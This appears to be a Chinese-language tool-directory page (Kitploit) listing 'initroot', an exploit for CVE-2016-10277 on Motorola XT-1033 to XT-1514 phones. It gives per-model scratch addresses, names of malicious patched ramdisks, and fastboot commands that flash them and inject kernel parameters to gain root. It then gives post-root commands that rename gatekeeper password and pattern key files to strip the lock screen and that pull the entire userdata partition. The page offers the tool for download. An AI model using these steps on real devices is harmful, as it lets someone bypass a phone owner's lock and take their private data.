Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/leosol/initroot
Android安全身份验证与授权权限提升漏洞利用数据泄露移动安全
GitHubleosol/initroot

initroot

利用CVE-2016-10277绕过安全启动和设备锁定

查看仓库
5337年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

利用 CVE-2016-10277

更多信息请访问:https://alephsecurity.com/2017/06/07/initroot-moto/

如果你只是想检查你的设备是否存在漏洞, 刷入未经任何修改的官方 ramdisk 可能会更快。 如果是这种情况,只需查找 initroot-*-STOCK*.cpio.gz。

Motorola XT-1033

  • 暂存地址:0x11000000
  • 填充:64MB
  • 官方填充 ramdisk:initroot-xt1033-p64-STOCK.cpio.gz
  • 官方修补并填充 ramdisk:initroot-xt1033-p64-MALICIOUS.cpio.gz

Motorola XT-1040

  • 暂存地址:0x11000000
  • 填充:64MB
  • 官方填充 ramdisk:initroot-xt1040-p64-STOCK.cpio.gz
  • 官方修补并填充 ramdisk:initroot-xt1040-p64-MALICIOUS.cpio.gz

Motorola XT-1068

  • 暂存地址:0x11000000
  • 填充:64MB
  • 官方填充 ramdisk:initroot-xt1068-p64-STOCK.cpio.gz
  • 官方修补并填充 ramdisk:initroot-xt1068-p64-MALICIOUS.cpio.gz

Motorola XT-1069

  • 暂存地址:0x11000000
  • 填充:64MB
  • 官方填充 ramdisk:initroot-xt1069-p64-STOCK.cpio.gz
  • 官方修补并填充 ramdisk:initroot-xt1069-p64-MALICIOUS.cpio.gz

Motorola XT-1078

  • 暂存地址:0x11000000
  • 填充:64MB
  • 官方填充 ramdisk:initroot-xt1078-p64-STOCK.cpio.gz
  • 官方修补并填充 ramdisk:initroot-xt1078-p64-MALICIOUS.cpio.gz

Motorola XT-1514

  • 暂存地址:0x90000000
  • 填充:64MB
  • 官方填充 ramdisk:initroot-xt1514-p64-STOCK.cpio.gz
  • 官方修补并填充 ramdisk:initroot-xt1514-p64-MALICIOUS.cpio.gz

运行并检查 root 权限:

  • 刷写并解决启动循环:

    root@kitploit:~
    git clone https://github.com/leosol/initroot.git
    cd xt1040 (or any other folder)
    use ./run-malicious.sh, run-stockramfs.sh and solve-bootloop.sh (if you have any bootloop)
    Or use the following commands:
    fastboot flash aleph $FILE_NAME
    fastboot oem config fsg-id "a initrd=SCRATCH+PAD,LENGTH"
    fastboot continue
    #use the following to solve bootloops
    fastboot oem config fsg-id ""
    
  • 检查 root 权限:

    root@kitploit:~
    root@debian-vaio:~/motoramfs/xt1040# adb devices
    List of devices attached
    * daemon not running. starting it now on port 5037 *
    * daemon started successfully *
    T0092020C5	device
    
    root@debian-vaio:~/motoramfs/xt1040# adb shell
    root@peregrine:/ # getenforce
    >Permissive
    
  • 获得 root 后能做什么?

    root@kitploit:~
    #remove authentication as pointed out by @kraftdenker (tested on xt1068)
    mv /data/system/gatekeeper.password.key /data/system/_gatekeeper.password.key
    mv /data/system/gatekeeper.pattern.key /data/system/_gatekeeper.pattern.key
    
    #dump your data
    adb pull /dev/block/platform/msm_sdcc.1/by-name/userdata
    
    #or make it permanent
    
下载工具